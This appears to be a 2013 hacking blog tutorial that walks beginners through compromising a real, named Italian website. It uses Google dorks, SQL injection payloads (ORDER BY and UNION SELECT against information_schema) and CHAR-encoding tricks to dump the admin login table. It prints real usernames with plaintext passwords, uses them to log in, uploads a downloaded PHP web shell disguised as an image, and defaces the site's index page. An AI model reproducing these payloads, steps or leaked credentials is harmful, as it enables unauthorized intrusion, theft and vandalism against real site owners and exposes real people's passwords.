Wednesday, 24 July 2013

Hacking a website with SQL Injection Explained for Beginners

hacking and defacing a site with SQL injection

In this tutorial following 3 things are covered.
  • Getting Admin Panel's Credentials of WEBSITE THROUGH SQL INJECTION
  • UPLOADING SHELL
  • DEFACE/HACK IT

Step 1:

Find an SQL vulnerable site !

To find such a site we will use google dorks.Google dorks are searching queries with which we can do advance search using google search engine.
type following query in google
inurl:news.php?nws=

this search will show the sites having the page of news.php?nws=

now you got so many result at page !
now open 1st site
like mine is http://www.area96.it/news.php?nws=61
now we will check if this site is vulnerbale to sql injection or not !
just add ' this at the end of site url address !

http://www.area96.it/news.php?nws=61'

nothing change ?

try to add before number
http://www.area96.it/news.php?nws=%2761

still nothing happened ?

http://www.area96.it/news.php?nws"61

if still nothing happened to page the leave the site and move to next site !

but luckly i dont need to move to next site this site is vulnerable

http://www.area96.it/news.php?nws=61'

by adding this ' the result of page changed !

now you can see this msg on page !
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
This is an SQL error which is showing that this site can be hacked !
One important thing to remember, sometimes some error appear which are not SQL errors so don't consider those sites to be hacked.How to identify that this error is SQL or not ??Its simple, u can check SQL keyword in error as a beginner guess to check either its an SQL error or not.
------------------------------------------------------------------------------------------------

Step 2 :

Admin Panel Finding:

now you will need to find the admin panel of this site to login as a administrator of this site !
admin panel is the area from where administrator of site login and Mainten the site
so for this there are some of tools available !
but for tutorial i will use this online admin finding site !

http://scan.subhashdasyam.com/admin-panel-finder.php

now we will paste the site link there
which is http://www.area96.it/
and click on dump!

it will start finding admin panel of website after 2 or 3 minutes it will give you a result of process !
now
http://www.area96.it/admin/index.php is in green color rest of all are red !
mean http://www.area96.it/admin/index.php is the admin panel of this website !
now open this page
http://www.area96.it/admin/index.php
it asking us to enter username and password to login !
now we will find the username and password in next step !
-------------------------------------------------------------------------------------------------

Step 3 :

Extracting Admin Panel Credentials:

now we need the username and password to login so we sill use
http://www.area96.it/news.php?nws=61'
this section again ! now write
http://www.area96.it/news.php?nws=61' order by 1--+-
the page remain same ?
http://www.area96.it/news.php?nws=61' order by 2--+-
same ?
continue this untill the error display on page !
http://www.area96.it/news.php?nws=61' order by 6--+-
same!
http://www.area96.it/news.php?nws=61' order by 7--+-
error Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
mean there is no 7 column in this !
so there are 6 column !

we got the column we will find the vulnerbale column now !
write

http://www.area96.it/news.php?nws=61' union select 1,2,3,4,5,6--+-
still the same ?
add - sign before the number!
http://www.area96.it/news.php?nws=-61' union select 1,2,3,4,5,6--+-

now
2
1
6

these three numbers are displayed on the page !

mean these three numbers are vulnerable columns !
now we will use these number to display username and password of website admin panel on the page !

now just change lil thing here !
choose any number from vulnerable column and change it to "group_concat(table_name)"
like i do
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6--+-

and after 6 add "from Information_schema.tables"
like this

http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-

now enter

now instead of number 2 column it will show tables name ! like this one

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET

this mean it showing us the table name !
but we need user name and password which is located in the database of website

so we will use

database also to extract username and password !

http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables--+-

just add 1 more line after information_schema.tables

which is "where table_schema=database()"
like this

http://www.area96.it/news.php?nws=-61' union select 1,group_concat(table_name),3,4,5,6 from Information_schema.tables where table_schema=database()--+-

now on the page !
it showing the database's tables !

accessi,chi_siamo,friends,friends_canzoni,friends_cd,friends_photo,friends_video,login,mostre,mostre_photo,news,prodotti,titoli_canzone,

these are tables

now we need to guess which table can contain username and password information !
i guess "login"
so we will see login table 1st !

now we will send the query to open login table !

change "(table_name)" to "(column_name)"
"information_schema.tables" to "information_schema.columns"
"table_schema" to "table_name"
and "database()" to "login"

but it will not work because it will not accept name of tables after "Table_name=" command
so we need to trick the site
so we will use decimal numbers instead of this table name!
we will convert the word Login to decimal numbers to it will accept it !

for this you can use this site !

http://www.branah.com/ascii-converter

from here u can convert any word to hex decimal and binary so we will type L o g i n in the box ASCii convertor !
give space between everyword of login because website need spaced numbers !
and clock on convert !
it is showing us now the result in decimal box
which is
108 111 103 105 110
now change it to
CHAR(108, 111, 103, 105, 110)
just add "CHAR" and , after every 3 numbers !
now we will use this instead of login !
so it will be

http://www.area96.it/news.php?nws=-61' union select 1,group_concat(column_name),3,4,5,6 from Information_schema.column where table_name=CHAR(108, 111, 103, 105, 110)--+-

the page show the result

id_login,username,password,email,admin,abilitato,id_friends

this mean these are the columns of table "login"
we need only username and password to login at admin panel so
now we will simply send the query to give us the username and password on the page !

just change
"(column_name)" to "(username,0x3a,password)"
and after "from" remove all words and add "login"

0x3a is converted form of : to get seprate answer of username and password !
and it would be
http://www.area96.it/news.php?nws=-61' union select 1,group_concat(username,0x3a,password) from Login--

the page show this result

davide:cippalippa,curvedair:oblivion,lorenzo01:bertocchini01,andrea01:braido01,mauro01:aimetti01,jjjedizionimusicali:joesjoint,renato01:franchi0

mean
1st user is
username=davide
password=cippalippa
2nd user is
username=curvedair
password=oblivion

etc
now we have the password we will move to admin panel to hack website-----
-------------------------------------------------------------------------------------------------

Step 4:

Shell Uploading: 

goto
http://www.area96.it/admin/index.php
and login with the username and password u just got !
username=davide
password=cippalippa

logged in successfully !

now you have access to change website products news etc ......

but to take fully control we need to upload shell in the website !

shell: shell is a kind of control panel which give you access to do whatever you want in the site !
shell is scripted in that way to give access you to do whatever u want to do with the hard-drive of website !

there are so many shell available but i will use and recommend u to use
MADSPOT-SHELL
its a 1st Pakistani and the world best shell !

you can download it from here

http://www.mediafire.com/?8b6dmgdo7edkus2

now find any area from where u can upload this shell like
add image add product etc

i have an option here for add news !
and it give me option of adding image of news !

i will try to upload madspotshell.php from image upload section !

just enter the news it will ask for image select madspotshell.php instead of any image !
upload successfully ! 
Note: Sometimes this is allowed that we can upload shell.php directly instead of image file.But most of the time file extensions are restricted i.e. only jpg,png,gif can be uploaded.So what to do in such situation?? Well we have a solution :) . We can temper HTTP headers with mozilla firefox adon called TEMPER DATA .Follow Shell Uploading with Temper Data for better understanding.

now just find the shell location!

normally it show an error icon on the image !
right click on error icon select copy image url/copy image location
and paste it to the url address like mine is

http://www.area96.it/images/news/1352954638mad.php

hit enter !

shell opened !
now you can remove add edit anyfile from here !

-------------------------------------------------------------------------------------------------

Final Step:

Defacement:

now u are in shell !
u need to hack this site !
the site default page is index
when ever you open a site like the target site is
http://www.area96.it/
it run on http://www.area96.it/index.php
so you will need to change the index.php file
in the shell u are in the directory where shell is uploaded !
like i uploaded my shell from image section so it is in
http://www.area96.it/images/news/

at the low top u can see this

PWD: /home/area96/area96.it/images/news/ |CURRENT|

which is showing your current directory

u need to edit index.php which is located at area96.it

so click on area96.it from
PWD: /home/area96/area96.it/images/news/ |CURRENT|
this line

it will open the PWD: /home/area96/area96.it/ |CURRENT|
directory !

now at the center u can see the files located in the folder !

also index.php

just rename ure deface page to index.php and upload it here !

it will over write the file and when someone open the site it will show your deface page at the site instead the site !

upload button is at the botton of the shell !

just replace ure index.php to /home/area96/area96.it/ |CURRENT

and the site is hacked!
now open the website and see ure name is there or not !

http://www.area96.it/
hacked by Pak Mad Hunters